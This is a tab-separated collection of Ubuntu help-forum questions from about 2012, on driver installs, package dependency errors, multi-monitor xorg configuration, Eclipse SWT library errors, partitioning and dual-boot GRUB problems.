199365	blob and conquer : sdl not showing textures	this is something that has happened since i upgraded to 9.10 , but has n't got fixed yet . i 'd like you to look at blob and conquer and some of his screenshots , like this one : now , install the app from the software center ( or by clicking here ) , run it and start a new game . then press enter . what do you see ? this : compare both screenshots . you do n't see any texture ! try moving around with the arrows and rotating with the mouse . even the weapons have no texture ( compare the bottom-left corners of the screenshots ) . my question is : why is this happening ? what can i do to fix it ? i can even modify the code if needed . i guess this has something to do with sdl .
199366	package dependencies can not be resolved	when i try to open avidio file like .mkv extension with mplayer it requires some multimedia plugin like gstreamer and and ubuntu 12.01 freshly installed and when i tell him to install them that error appears to me : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . the following packages have unmet dependencies : gstreamer0.10-ffmpeg : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10.2 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed gstreamer0.10-ffmpeg : i386 : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10.2 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed and i searched and found that the most solution said sudo apt-get clean sudo apt-get autoclean sudo apt-get install -f and i tried them and nothing happen and the content of my sources.list is # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //eg.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //eg.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //eg.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //eg.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //eg.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //eg.archive.ubuntu.com/ubuntu/ precise universe deb http : //eg.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //eg.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //eg.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //eg.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //eg.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //eg.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //eg.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //eg.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main so the question is how to install these plugin to can enjoy watching my movies and videos
199368	will nvidia proprietary drivers work or should i use manually installed cuda for ubuntu 12.04 & blender 2.64 ?	i am currently running the manually installed nvidia 64-295.49 cuda drivers in 12.04lts with my geforce gtx 560 ti , mainly for blender 2.64 gpu rendering , but each time the kernel updates i have to reinstall the driver . it 's not difficult , but without some valuable time spent i never know if i 'm using the latest version . i am wondering if i could just use the recommended `` nvidia binary xorg driver , kernel module and vdpau library '' that appears in the additional drivers dialog . will it support cuda ? has anyone had any success with it ? ( i could try it and see , but it could lead to several hours trying to recover from failed attempt that i can not afford to spare. ) alternatively , how can i simplify the process of updating and reinstalling the nvidia cuda driver . thank you .
199369	is there a tool like omnipeek ? which tool can be used to capture wlan packets ?	i want to find a tool like omnipeek on my ubuntu precise , but did n't find . which tools can be used to capture wlan packets on linux ?
199373	how to tweak the appearance of desktop icons in lubuntu ?	in ubuntu 11.10 with nautilus it was possible to tweak the appearance of desktop icons by editing nautilus.css as i had posted in how can i change the text colour on my desktop icons ? . in xubuntu the same can be done by adding a few lines to one 's .gtkrc-2.0 as described in how to highlight items on desktop using xfce ? . in both cases , it is possible to assign colors to the various icon states ( such as normal , selected and active ) . is it possible to do the same in lubuntu ? pcmanfm seems to be responsible but i ca n't find any gui or files to edit for the purpose . the default ~/.config/pcmanfm/lubuntu/pcmanfm.conf does n't have any relevant settings .
199375	ubuntu not displaying full 4gb memory on 64bit installation !	my ubuntu install is no using 100 % of the memory installed . lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal # sudo lshw -short h/w path device class description =================================================== system computer /0 bus d915gvwb /0/0 processor intel ( r ) pentium ( r ) 4 cpu 3.60ghz /0/0/1 memory 16kib l1 cache /0/0/2 memory 2mib l2 cache /0/3 memory 64kib bios /0/12 memory 4gib system memory /0/12/0 memory 1gib dimm ddr synchronous 400 mhz ( 2.5 ns ) /0/12/1 memory 1gib dimm ddr synchronous 400 mhz ( 2.5 ns ) /0/12/2 memory 1gib dimm ddr synchronous 400 mhz ( 2.5 ns ) /0/12/3 memory 1gib dimm ddr synchronous 400 mhz ( 2.5 ns ) # cat /proc/meminfo memtotal : 3073396 kb # free -m total used free shared buffers cached mem : 3001 993 2008 0 50 529 -/+ buffers/cache : 413 2588 swap : 3060 0 3060 htop displays 3001mb as well .
199378	after drop of unity2d in 12.10 : how to tackle high load of unity/compiz on netbooks ?	update : though it 's not fully clear to me why this q should be off-topic and i have doubts that a bug report will help , i filed a bug report at https : //bugs.launchpad.net/unity/+bug/1067349 please vote for it if you are affected , too ! i have a nice lenovo thinkpad edge 11 amd neo ii with a ati radeon 4225 integrated graphics device . in my perception this is already a not-so-lowspeced device , but still a netbook . up to ubuntu 12.04 precise pangolin i preferred unity2d over unity mainly because it did perform much better than unity and moreover i was able to achieve 5-6h with one battery charge . the typical load of an idling desktop settled around 0.00 to 0.02 . yesterday i tried the new beta 2 of ubuntu quantal quetzal : this does no longer offer a unity2d version . the performance itself has definitely improved over unity in precise , but nevertheless i do experience now a minimum load of 0.24 to 0.36 while completely idling . according to top this is mainly due to compiz eating about 3-6 % cpu all the time . in comparison to my unity2d experience , quantal is more sluggish , eats much faster my battery and produces significant more fan noise . i already tried a few tweaks like static blurring , fast texture renderer or choosing alternate window manager . are there ways which enable me to continue to use ubuntu/unity on my device without major loss of functionality , performance and battery life ?
199379	nvidia driver stops working after kernel update	at work i have a desktop with an nvidia card . 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gk104 [ geforce gtx 660 ti ] [ 10de:1183 ] ( rev a1 ) when ever i get an update that requires a reboot ( linux/kernel update ) . the graphics stops working , and i have to login with text terminal . i then type sudo jockey-text -- disable=xorg : nvidia_current and sudo reboot . this allows me to login in a low res graphics mode . i then reinstall , and then enable the nvidia driver , then logout/reboot . is there a way to fix this so that the nvidia driver is built into the new kernel ? i have dkms and kernel headers installed .
199383	how can i know which version of the c++ `` standard library '' is installed ?	i would like to install the c++ standard library documentation ( following the answers in download c++ reference ) but i do not know which version of library is installed in my ubuntu .
199384	how can i create an image of my linux install to an external drive formatted with exfat ?	i have a 500 gig external usb drive formatted as exfat . i can not create an image from my 12.04 install to this drive with redo backup ( i found out it lacks support for exfat ) . note the image will be over 5 gig so fat32 is not an option for the external drive . is there another free program i can use to make an image ? ( gui would be best ) note i was able to add exfat support to 12.04 and can see the drive and add files manually as well as delete them . thanks for any advise . please delete this post , i am new to linux and since i can not make an image i will not be using it anynore . i do not comprehend the answer but i appreciate the lone respone
199389	please help..dual boot question	this is probably simple to explain/resolve but i need help with dual booting . i have win7 installed . i just installed ubuntu . before the ubuntu installation , i took the necessary steps . such as create new partition , assign for storage space and also swap space . once , i started installation everything went smoothly . however , after confirming `` no '' to import settings from win7 to ubuntu ( such as mozilla firefox settings etc . for users ) i restarted the computer to complete the install . naturally , in a dual boot situation the pc displays which system to start ( win7 or ubuntu ) . i do n't get this screen . it just boots directly to ubuntu . i need to be able to choose either win7 or ubuntu . any help is appreciated , thank you . i know my win7 loader is in dev/sda1 and i think that i also updated the grub ... please help
199390	server is not visible from internet	i 've set up a server running 12.04 server edition which is connected to internet via lte modem and shared to the internet as a wifi hotspot . i 've also installed no-ip on a server and gave it a host . so when i try to ssh to server using its local ip ( 10.10.0.1 ) , everything is ok . but when i try to use its host ( oldrustyjack.no-ip.info ) , i can not connect . but server responds to ping . sorry for bad english .
199391	how do i set up three monitors with 2x nvidia nvs 300 ?	i have got triple monitor setup , with two nvidia graphics adapters . i wanted to set it up the same way as it is configured when i run ubuntu under vmware - e.g . each screen allows to separately maximize one application . at the moment i am only able to configure the screens so they are all white , and when i move cursor it changes into black cross . below is my setup - there is only single screen per adapter is configured right now ( to nail down the problem - on single adapter with two monitors i am able to enable twinview , but it is not what i am looking for ) . i know that ubuntu is completely fine working with 3 screens , because i have it running in vm on the same setup . i just do not know how to make it run on real hw . please , help , i do not want to run windows + vm just to run ubuntu with multiple screens . $ lspci | grep vga 04:00.0 vga compatible controller : nvidia corporation gt218 [ nvs 300 ] ( rev a2 ) 05:00.0 vga compatible controller : nvidia corporation gt218 [ nvs 300 ] ( rev a2 ) $ sudo lshw -c video [ sudo ] password for kpalczynski : *-display description : vga compatible controller product : gt218 [ nvs 300 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:32 memory : cc000000-ccffffff memory : d0000000-d3ffffff memory : d4000000-d5ffffff ioport : c000 ( size=128 ) memory : cd000000-cd07ffff *-display description : vga compatible controller product : gt218 [ nvs 300 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:40 memory : ce000000-ceffffff memory : d8000000-dbffffff memory : dc000000-ddffffff ioport : d000 ( size=128 ) memory : cf000000-cf07ffff kpalczynski @ aam05 : ~ $ sudo lshw -c video *-display description : vga compatible controller product : gt218 [ nvs 300 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:32 memory : cc000000-ccffffff memory : d0000000-d3ffffff memory : d4000000-d5ffffff ioport : c000 ( size=128 ) memory : cd000000-cd07ffff *-display description : vga compatible controller product : gt218 [ nvs 300 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:40 memory : ce000000-ceffffff memory : d8000000-dbffffff memory : dc000000-ddffffff ioport : d000 ( size=128 ) memory : cf000000-cf07ffff xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 175 , current 1920 x 1080 , maximum 1920 x 1080 default connected 1920x1080+0+0 0mm x 0mm 1920x1080 50.0 51.0* 1680x1050 52.0 53.0 1600x1024 54.0 1440x900 55.0 1400x1050 56.0 57.0 58.0 1360x768 59.0 60.0 1280x1024 61.0 62.0 63.0 1280x960 64.0 65.0 1152x864 66.0 67.0 68.0 69.0 70.0 71.0 72.0 1024x768 73.0 74.0 75.0 76.0 77.0 78.0 960x720 79.0 80.0 960x600 81.0 960x540 82.0 928x696 83.0 84.0 896x672 85.0 86.0 840x525 87.0 88.0 89.0 90.0 91.0 832x624 92.0 800x600 93.0 94.0 95.0 96.0 97.0 98.0 99.0 100.0 101.0 102.0 800x512 103.0 720x450 104.0 720x400 105.0 700x525 106.0 107.0 108.0 109.0 680x384 110.0 111.0 640x512 112.0 113.0 114.0 640x480 115.0 116.0 117.0 118.0 119.0 120.0 121.0 640x400 122.0 640x350 123.0 576x432 124.0 125.0 126.0 127.0 128.0 129.0 130.0 512x384 131.0 132.0 133.0 134.0 135.0 416x312 136.0 400x300 137.0 138.0 139.0 140.0 141.0 360x200 142.0 320x240 143.0 144.0 145.0 146.0 320x200 147.0 320x175 148.0 $ cat /etc/x11/xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 15:25:24 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 1920 0 screen 1 `` screen1 '' leftof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell u2312hm '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` dell u2312hm '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` nvs 300 '' busid `` pci:5:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` nvs 300 '' busid `` pci:4:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : 1920x1080_60_0 +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
199395	changing system terminal colours ?	so i have my computer set up just the way i want , with gnome 3 in my favorite color scheme , and the terminal in a matching background/text color scheme . even the login screen has my desktop background . however it is a little jarring when i shut down/use grubby and its in the default maroon and white scheme . is there any way to change this to make it more similar to my own color scheme in terminal ?
199396	how to i get gnome out of `` fallback mode '' ?	how do i restore gnome 3 to normal and get it out of fallback ? i 'm sure that this likely is relative to my other question posted here : i can not install a proporietary fglrx driver i 'm just having a really hard time with this . this is the 4th fresh install of 12.04 , and i would like to avoid having to format and install again .
199403	i have a problem with eclipse	please , i 've installed oracle java jdk and eclipse , and every thing goes well , but i ca n't add eclipse for the launcher , i have every time i use it to access it from the terminal , my ubuntu is 10.04 , but i 'm not sure how can i open it from the launcher or even from the desktop ? thanks in advance edit : assuming this is in relation to the same question root @ deepak : ~ # eclipse ** ( eclipse:28003 ) : warning ** : the connection is closed find : `/root/.eclipse ' : no such file or directory find : `/root/.eclipse ' : no such file or directory w : can not inject update-sites , can not find the correct config . ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed similar when i try to logged in user then /home/deepak/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/1350065308917.log . log message ! session 2013-10-12 23:38:28.737 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_07 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_in command-line arguments : -os linux -ws gtk -arch x86 ! entry org.eclipse.osgi 4 0 2012-10-12 23:38:31.851 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/deepak/.swt/lib/linux/x86/libswt-gtk-3740.so ca n't load library : /home/deepak/.swt/lib/linux/x86/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java:153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 )
199405	what kind of support does canonical provide on a business level ?	i was wondering about support for ubuntu in general . if a small and or large business is running ubuntu , what type of issues does canonical help out with ? examples : if a business is running a windows app , via wine does canonical help out with that when a business is running software that is not installed via the software-center , but , via ppa ( stable/beta ) and or downloaded manually . some examples apps libreoffice/handbrake/openshot etc ... etc ... does canonical give support when those app have issues ? when a business is trying to migrate from lotes notes/outlook to thunderbird ?
199407	eclipse with log error	root @ deepak : ~ # eclipse ** ( eclipse:28003 ) : warning ** : the connection is closed find : `/root/.eclipse ' : no such file or directory find : `/root/.eclipse ' : no such file or directory w : can not inject update-sites , can not find the correct config . ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed ** ( eclipse:28002 ) : warning ** : the connection is closed similar when i try to logged in user then /home/deepak/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration/1350065308917.log . log message ! session 2013-10-12 23:38:28.737 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_07 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86 , ws=gtk , nl=en_in command-line arguments : -os linux -ws gtk -arch x86 ! entry org.eclipse.osgi 4 0 2012-10-12 23:38:31.851 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/deepak/.swt/lib/linux/x86/libswt-gtk-3740.so ca n't load library : /home/deepak/.swt/lib/linux/x86/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java:153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 )
199413	why does the first partition start at sector 34 when i choose `` guided - use entire disk '' during install ?	after choosing `` guided - use entire disk '' during installation of ubunsut server 12.04 i find that the first partition starts on sector 34 . why that specific sector and not the first one ? ( parted ) print model : ata wdc wd30ezrx-00m ( scsi ) disk /dev/sda : 5860533168s sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 34s 390659s 390626s fat32 boot 2 390660s 890660s 500001s ext2 3 890661s 5860533118s 5859642458s ( parted ) in case you prefer bytes as the unit : ( parted ) unit b ( parted ) print model : ata wdc wd30ezrx-00m ( scsi ) disk /dev/sda : 3000592982016b sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 17408b 200017919b 200000512b fat32 boot 2 200017920b 456018431b 256000512b ext2 3 456018432b 3000592956927b 3000136938496b
199414	virtual box : problems using usb phone	i 'm not completely sure if this is the right part of stackexchange to ask this question , so if i 'm in the wrong place , i 'm sorry . so , i am trying to set up a ubuntu vm for android development . therefore i want to use my phone inside my vm for debugging my applications . after 2 days of struggling with virtual box ' usb forwarding ( it always told me the device was busy ) , i found out that using usb 3.0 ports was a problem . now at least virtual box is n't complaining anymore , but now i am getting error messages inside my vm ( dmesg ) : [ 2680.841115 ] hub 1-0:1.0 : unable to enumerate usb device on port 2 i get these messages every second . lsusb is not listing my device . can anyone explain the reason i get these errors to me ? currently i have disabled usb 2.0 in virtual box . i installed the extension pack . my configuration : host : windows 7 x64 guest : ubuntu 12.04 phone : samsung galaxy s with android 4.0 virtual box : 4.1.22 i hope you have an answer to my problem , because right now i have to export all my apps as apk and install the to my device manually without the ability to view debug logs . if you need more information or additional logfiles , please say so . edit : just to be clear : i do n't use vmware ( because all the possible dublicates referred to a vmware question ) so , correct me if i 'm wrong , i ca n't use the solution provided there . as of now i am using adb over tcp to debug my applications in virtual box , but i do n't want to continue using this , because now others do n't even need physical access to my phone to run adb commants ( as root user ! ) on my phone .
199415	how i remove grub text in ubuntu3 version ?	how i remove grub text '' use the up or down arrow keys to select which entry is highlighted . press enter to boot the selected os , 'e ' to edit the commands before booting , or 'c ' for a command-line. `` in ubuntu3 version ? thank you
199417	how to change laptop screen 's contrast ?	i use xubuntu 12.04 on a samsung ultrabook ( series 5 ultra ) . how can i adjust the contrast of the laptop 's screen ?
199418	i ca n't run any command in terminal	i tried to enter the command nano ~/.bashrc in order to include some path into the .bashrc file in home directory but i 'm not able to run any command and i get always the following error : rag @ rag-satellite-c640 : ~ $ nano ~/.bashrc command 'nano ' is available in the following places * /bin/nano * /usr/bin/nano the command could not be located because '/usr/bin : /bin ' is not included in the path environment variable . nano : command not found why this is happening with any command that i 'm trying ? what i want to do is edit the .bashrc file .
199422	how do i install goodsync ?	i am heavy user of goodsync ( link ) on my windows boxes , and i 'd like to give the command line version a try . so i download the linux packet on my ubuntu rig , and extract it , but from then on i am lost . i get the extracted files but i do n't know what to do with them . i 've looked online for possible solutions like here ( http : //www.makeuseof.com/tag/compile-install-tar-gz-tar-bz2-files-ubuntu-linux/ ) , but i ca n't wrap my brains around it . there is no install or /.config file anywhere . what am i missing ?
199433	creating a web server	here 's my problem in a nutshell : i have been given an old computer ( windows 2000 for now ) and i need to install an ubuntu os ( i 'm thinking about ubuntu server ) , moodle and perhaps a website . after this , the responsible for the network will connect my computer to it . here are my questions : 1 ) what is the best os that i should use ? the computer wo n't be a desktop computer and i need it running at max speed . it will only be a server where i put moodle so that my mates can access it and view the website . 2 ) although it is not a desktop computer , can i still edit the files locally ? 3 ) how do i create an account with max privileges so i can edit files remotely ? 4 ) do you suggest any software i could install in order to make things more easy ?
199438	windows 7 wo n't boot	i installed ubuntu from my live cd and chose to install it alongside windows . yesterday , everything worked just fine and i was able to boot from either os . however today , only ubuntu will boot and windows 7 fails to start every time i attempt to ( even after restoring my windows 7 partition to the last known good date ) . what could have changed over night that caused this ? i did install all the recommended updates for ubuntu . is my only option going to be to wipe my hdd and reinstall both windows and ubuntu ?
199440	thinkpad t530 with optimus and docking station	i have a lenovo thinkpad t530 with optimus video , which is not supported on 12.04.1 . i do n't normally need the discrete ( nvidia ) graphics , so i turn it off in the bios settings to achieve longer battery life ( and so that the screen dimmer will work ) , but when placed in the docking station , the integrated ( intel ) graphics do n't power the hdmi ports . ( the vga port does work , but i want to focus on the hdmi . ) this means i have to change the bios settings constantly . is there any way to have the system detect the docking station and power up/enable the discrete graphics accordingly ? i do n't need to do it on the fly . just at startup . this post suggests that bumblebee can turn the discrete graphics on and off for specific applications , but i just want to turn it on or off . [ 2 suggests that vga_switcheroo will not work with nvidia optimus .
199447	wireless not connecting automatically	my wireless is working fine , but when i login , it does not connect automatically , i have to select it from the list each and every time to use it . even though the connect automatically option is selected in the network options . so basically , after booting it , i do n't get connected to the network until i choose connect to hidden wireless network , followed by selecting the hidden network , and clicking connect .
199454	prostar gaming laptop , which had ubuntu 10.10 , wo n't boot past grub . thoughts ?	at work we have some high-end gaming laptops we use for their dual gpus . the machines have second generation i7 cpus , and came with windows 7 . on most of them i installed ubuntu 10.10 , and all was fine . there were two laptops that i wanted to repurpose and wanted to reinstall the os . it boots the cd ( burned ubuntu installation cd , i 've tried 10.10 , 11.10 , and 12.04 , as well as centos 6 ) , and when grub tried to boot the kernel , i just get a cursor blinking in the upper left corner of the screen . i tried the disabling of acpi and the other items in the advanced menu , but nothing works . i could still boot to the current linux installation though . i was able to install windows 7 again , and use wubi , but i think that works because it uses the windows bootloader and not grub . how could it have worked before and not now ? i have confirmed that the cd is fine , as are the hard drive and cd drive . i also had the same problem with debian , and had to boot through windows 7 to install it .
